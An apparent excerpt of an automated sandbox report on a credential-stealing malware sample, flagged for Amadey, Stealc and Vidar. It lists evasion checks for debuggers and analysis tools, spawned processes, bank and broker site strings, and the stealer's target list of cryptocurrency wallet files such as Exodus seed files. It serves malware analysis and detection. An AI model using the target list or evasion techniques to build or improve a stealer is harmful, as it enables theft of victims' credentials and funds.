                          Source: RoamingCBGCBGCAFI.exe, 00000017.00000003.2584869695.0000000000A8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: file.exe, 00000000.00000003.2269118262.0000000026C9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                          Source: file.exe, 00000000.00000003.2269118262.0000000026C9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                          Source: file.exe, 00000000.00000002.2525036759.000000000086C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2525036759.0000000000841000.00000004.00000020.00020000.00000000.sdmp, 4ddf12fb51.exe, 0000002F.00000002.2934283237.000000000077C000.00000004.00000020.00020000.00000000.sdmp, 4ddf12fb51.exe, 0000002F.00000002.2934283237.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, 4ddf12fb51.exe, 00000032.00000002.3040813931.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, 4ddf12fb51.exe, 00000032.00000002.3040813931.0000000000A30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: file.exe, 00000000.00000003.2269118262.0000000026C9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                          Source: firefox.exe, 00000012.00000003.2741788150.000001E955DC7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2804241041.000001E955DBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
                          Source: file.exe, 00000000.00000003.2269118262.0000000026C9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                          Source: file.exe, 00000000.00000003.2269118262.0000000026C9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                          Source: file.exe, 00000000.00000003.2269118262.0000000026C9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                          Source: file.exe, 00000000.00000003.2269118262.0000000026C9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                          Source: file.exe, 00000000.00000002.2525036759.000000000086C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW"
                          Source: file.exe, 00000000.00000003.2269118262.0000000026C9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                          Source: file.exe, 00000000.00000003.2269118262.0000000026C9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                          Source: file.exe, 00000000.00000003.2269118262.0000000026C9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                          Source: file.exe, 00000000.00000003.2269118262.0000000026C9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                          Source: userGDHIIIIEHC.exe, 00000006.00000003.2480444082.000000000095F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}`=
                          Source: 4ddf12fb51.exe, 00000032.00000002.3040813931.0000000000A05000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwaren
                          Source: file.exe, 00000000.00000003.2269118262.0000000026C9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                          Source: file.exe, 00000000.00000003.2269118262.0000000026C9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                          Source: 4ddf12fb51.exe, 00000032.00000002.3040813931.0000000000A5F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
                          Source: file.exe, 00000000.00000003.2269118262.0000000026C9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                          Source: file.exe, 00000000.00000003.2269118262.0000000026C9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                          Source: file.exe, 00000000.00000003.2269118262.0000000026C9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                          Source: file.exe, 00000000.00000003.2269118262.0000000026C9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                          Source: file.exe, 00000000.00000003.2269118262.0000000026C9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                          Source: file.exe, 00000000.00000003.2269118262.0000000026C9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                          Source: 4ddf12fb51.exe, 00000032.00000002.3040813931.0000000000A05000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                          Source: file.exe, 00000000.00000003.2269118262.0000000026C9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                          Source: file.exe, 00000000.00000003.2269118262.0000000026C9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                          Source: file.exe, 00000000.00000003.2269118262.0000000026C9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                          Source: file.exe, 00000000.00000003.2269118262.0000000026C9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                          Source: file.exe, 00000000.00000003.2269118262.0000000026C9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                          Source: file.exe, 00000000.00000003.2269118262.0000000026C9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                          Source: userGDHIIIIEHC.exe, 00000006.00000002.2650632272.0000000000DD1000.00000040.00000001.01000000.00000009.sdmp, RoamingCBGCBGCAFI.exe, 00000017.00000002.2672454678.0000000000F47000.00000040.00000001.01000000.0000000F.sdmp, explorti.exe, 0000002A.00000002.2667292642.0000000000CA1000.00000040.00000001.01000000.00000018.sdmp, axplong.exe, 0000002B.00000002.2696738994.0000000000897000.00000040.00000001.01000000.00000019.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                          Source: 4ddf12fb51.exe, 0000002F.00000002.2934283237.0000000000752000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareO
                          Source: file.exe, 00000000.00000003.2269118262.0000000026C9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                          Source: file.exe, 00000000.00000003.2269118262.0000000026C9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                          Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-67080
                          Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-67120
                          Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-67077
                          Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-68256
                          Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-67098
                          Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-67091
                          Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-67099
                          Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-66854
                          Source: C:\Users\userGDHIIIIEHC.exeSystem information queried: ModuleInformationJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeProcess information queried: ProcessInformationJump to behavior

                          Anti Debugging

                          barindex
                          Hides threads from debuggers
                          Source: C:\Users\userGDHIIIIEHC.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread information set: HideFromDebugger
                          Tries to detect sandboxes and other dynamic analysis tools (window names)
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: gbdyllo
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: procmon_window_class
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: ollydbg
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: NTICE
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: SICE
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: SIWVID
                          Source: C:\Users\userGDHIIIIEHC.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPort
                          Source: C:\Users\userGDHIIIIEHC.exeCode function: 6_2_04BF02B6 rdtsc 6_2_04BF02B6
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041ACFA
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404610 VirtualProtect ?,00000004,00000100,000000000_2_00404610
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004195E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004195E0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00419160 mov eax, dword ptr fs:[00000030h]0_2_00419160
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,KiUserExceptionDispatcher,InternetCloseHandle,InternetCloseHandle,0_2_00405000
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041C8D9 SetUnhandledExceptionFilter,0_2_0041C8D9
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041ACFA
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041A718 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041A718
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA5B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6CA5B66C
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA5B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CA5B1F7
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CC0AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CC0AC62
                          Source: C:\Users\userCFHCBKKFIJ.exeCode function: 9_2_00409950 SetUnhandledExceptionFilter,9_2_00409950
                          Source: C:\Users\userCFHCBKKFIJ.exeCode function: 9_2_00409930 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,9_2_00409930
                          Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Yara detected Powershell download and execute
                          Source: Yara matchFile source: Process Memory Space: file.exe PID: 1588, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: explorti.exe PID: 504, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: 4ddf12fb51.exe PID: 9252, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: 4ddf12fb51.exe PID: 9912, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\num[1].exe, type: DROPPED
                          Maps a DLL or memory area into another process
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeSection loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe protection: readonly
                          Searches for specific processes (likely to inject)
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_004190A0
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userGDHIIIIEHC.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userCFHCBKKFIJ.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingCBGCBGCAFI.exe"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\userGDHIIIIEHC.exe "C:\Users\userGDHIIIIEHC.exe" Jump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\userCFHCBKKFIJ.exe "C:\Users\userCFHCBKKFIJ.exe" Jump to behavior
                          Source: C:\Users\userCFHCBKKFIJ.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\2656.tmp\2657.tmp\2658.bat C:\Users\userCFHCBKKFIJ.exe"Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\RoamingCBGCBGCAFI.exe "C:\Users\user\AppData\RoamingCBGCBGCAFI.exe"
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeProcess created: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe "C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe"
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess created: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exe "C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exe"
                          Source: userGDHIIIIEHC.exe, 00000006.00000002.2650632272.0000000000DD1000.00000040.00000001.01000000.00000009.sdmpBinary or memory string: kProgram Manager
                          Source: userGDHIIIIEHC.exeBinary or memory string: !kProgram Manager
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA5B341 cpuid 0_2_6CA5B341
                          Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00417630
                          Source: C:\Users\user\Desktop\file.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00417420 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA,0_2_00417420
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004172F0 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_004172F0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004174D0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,0_2_004174D0
                          Source: C:\Users\userCFHCBKKFIJ.exeCode function: 9_2_0040559A GetVersionExW,GetVersionExW,9_2_0040559A

                          Stealing of Sensitive Information

                          barindex
                          Yara detected Amadeys stealer DLL
                          Source: Yara matchFile source: 43.2.axplong.exe.6a0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 6.2.userGDHIIIIEHC.exe.be0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 23.2.RoamingCBGCBGCAFI.exe.d50000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 42.2.explorti.exe.ab0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000002A.00000002.2666201612.0000000000AB1000.00000040.00000001.01000000.00000018.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002D.00000003.2736517396.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002B.00000002.2696337609.00000000006A1000.00000040.00000001.01000000.00000019.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000006.00000002.2649666467.0000000000BE1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002A.00000003.2622761332.00000000048E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000006.00000003.2403574007.0000000004A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000017.00000003.2486192169.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000003.2737791928.0000000004C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002B.00000003.2655835967.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000017.00000002.2671896489.0000000000D51000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
                          Yara detected Stealc
                          Source: Yara matchFile source: 50.2.4ddf12fb51.exe.7d0e67.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.2525036759.0000000000812000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002F.00000002.2934283237.0000000000752000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000032.00000002.3040813931.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: file.exe PID: 1588, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: 4ddf12fb51.exe PID: 9252, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: 4ddf12fb51.exe PID: 9912, type: MEMORYSTR
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Yara detected Vidar stealer
                          Source: Yara matchFile source: Process Memory Space: file.exe PID: 1588, type: MEMORYSTR
                          Found many strings related to Crypto-Wallets (likely being stolen)
                          Source: file.exe, 00000000.00000002.2524333404.00000000007E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
